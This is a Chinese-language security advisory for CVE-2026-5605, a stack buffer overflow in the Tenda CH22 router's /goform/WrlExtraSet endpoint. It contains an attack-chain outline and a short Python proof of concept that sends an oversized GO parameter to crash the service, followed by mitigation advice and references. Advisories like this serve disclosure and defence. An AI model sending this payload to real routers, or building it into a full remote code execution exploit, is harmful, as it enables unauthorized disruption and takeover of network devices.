CVE-2026-5605 Tenda CH22 栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5605

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda CH22

漏洞概述

Tenda CH22路由器1.0.0.1版本在/goform/WrlExtraSet接口处存在严重的栈缓冲区溢出漏洞。该漏洞源于formWrlExtraSet函数未对用户提交的GO参数进行有效的长度校验，导致攻击者可以通过发送超长恶意数据覆盖栈上的返回地址。由于攻击无需用户交互且可远程触发，攻击者可借此获取设备控制权。目前相关利用代码已公开，风险极高，需立即采取防御措施。

技术细节

该漏洞根源在于Tenda CH22路由器固件中处理/goform/WrlExtraSet请求的formWrlExtraSet函数存在严重的内存安全缺陷。程序在接收HTTP POST请求时，直接获取用户提交的GO参数，并使用不安全的拷贝操作（如strcpy）将其复制到栈上分配的局部变量缓冲区中。由于代码缺失对输入数据长度的必要校验机制，当攻击者发送的GO参数长度超过预设缓冲区大小时，便会触发栈缓冲区溢出。在典型的MIPS架构路由器环境下，攻击者可通过精确控制溢出数据，覆盖栈帧中的返回地址或关键寄存器（如$ra或$s寄存器），将程序控制流重定向至注入的Shellcode或精心构造的ROP（面向返回编程）链中。鉴于路由器Web服务通常运行在Root权限下，成功利用该漏洞可导致完整的远程代码执行（RCE），攻击者进而可获得设备的完全控制权，窃取敏感网络流量、篡改配置或植入持久化后门，对网络安全构成严重威胁。

攻击链分析

STEP 1

1. 信息侦察

攻击者扫描网络，识别暴露的Tenda CH22路由器及其Web管理接口。

STEP 2

2. 漏洞利用

攻击者向/goform/WrlExtraSet端点发送特制的HTTP POST请求，包含超长的GO参数。

STEP 3

3. 触发溢出

服务器处理请求时，由于缓冲区溢出覆盖返回地址，导致程序崩溃或执行流程被劫持。

STEP 4

4. 获取控制

成功劫持控制流后，攻击者在设备上执行Shellcode，获取Root权限的远程Shell。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    """
    Proof of Concept for CVE-2026-5605
    Sends a malicious payload to trigger stack overflow in Tenda CH22.
    """
    url = f"http://{target_ip}/goform/WrlExtraSet"
    
    # Constructing a payload to overflow the buffer
    # The exact offset needs to be determined based on firmware analysis
    # This payload sends a large string to crash the service
    payload_data = {
        "GO": "A" * 1000  # Example payload length
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    try:
        print(f"[+] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=payload_data, headers=headers, timeout=5)
        
        if response.status_code == 200:
            print("[!] Request sent, but service might not have crashed. Check device connectivity.")
        else:
            print(f"[+] Target responded with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[+] Connection error occurred (likely crash): {e}")

if __name__ == "__main__":
    target = "192.168.0.1"  # Replace with actual target IP
    exploit_poc(target)

影响范围

Tenda CH22 1.0.0.1

防御指南

临时缓解措施

如果无法立即升级，建议通过访问控制列表（ACL）严格限制管理端口的访问源IP，仅允许受信任的内网设备进行管理，并定期检查路由器日志是否存在异常访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5605
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5605
3 Details https://www.cvedetails.com/cve/CVE-2026-5605/
4 VulDB https://vuldb.com/cve/CVE-2026-5605
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/CH22/vul_54/README.md
6 Link https://vuldb.com/submit/785052
7 Link https://vuldb.com/vuln/355397
8 Link https://vuldb.com/vuln/355397/cti
9 Link https://www.tenda.com.cn/